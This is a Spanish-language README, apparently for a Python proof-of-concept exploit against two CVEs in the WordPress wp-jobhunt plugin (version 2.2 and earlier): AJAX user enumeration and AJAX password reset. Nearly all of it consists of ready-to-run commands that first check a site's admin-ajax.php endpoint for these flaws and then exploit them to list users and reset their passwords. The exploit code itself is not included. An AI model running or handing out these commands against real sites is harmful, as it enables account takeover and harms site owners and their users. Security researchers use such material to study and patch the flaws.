
CVE-2018-19487, CVE-2018-19488, exploit para el plugin wp-jobhunt de WordPress
CVE-2018-19487, CVE-2018-19488, exploit para el plugin wp-jobhunt de WordPress
El plugin wp-jobhunt es un plugin utilizado con el tema JobCareer:
https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636 (ver el registro de cambios al final)
Exploit en Python para CVE-2018-19487 (divulgación de información de usuario AJAX) y CVE-2018-19488 (restablecimiento de contraseña de usuario AJAX) para la versión 2.2 y anteriores.
REQUISITOS:
CÓMO USAR:
Comprobar si es vulnerable a la enumeración de usuarios:
python poc.py --checkenum https://wpsite/path/to/wp-admin/admin-ajax.php
Comprobar si es vulnerable al restablecimiento de contraseña de usuario:
python poc.py --checkreset https://wpsite/path/to/wp-admin/admin-ajax.php
Explotar la enumeración de usuarios:
python poc.py --enum https://wpsite/path/to/wp-admin/admin-ajax.php
Explotar el restablecimiento de contraseña de usuario:
python poc.py --reset https://wpsite/path/to/wp-admin/admin-ajax.php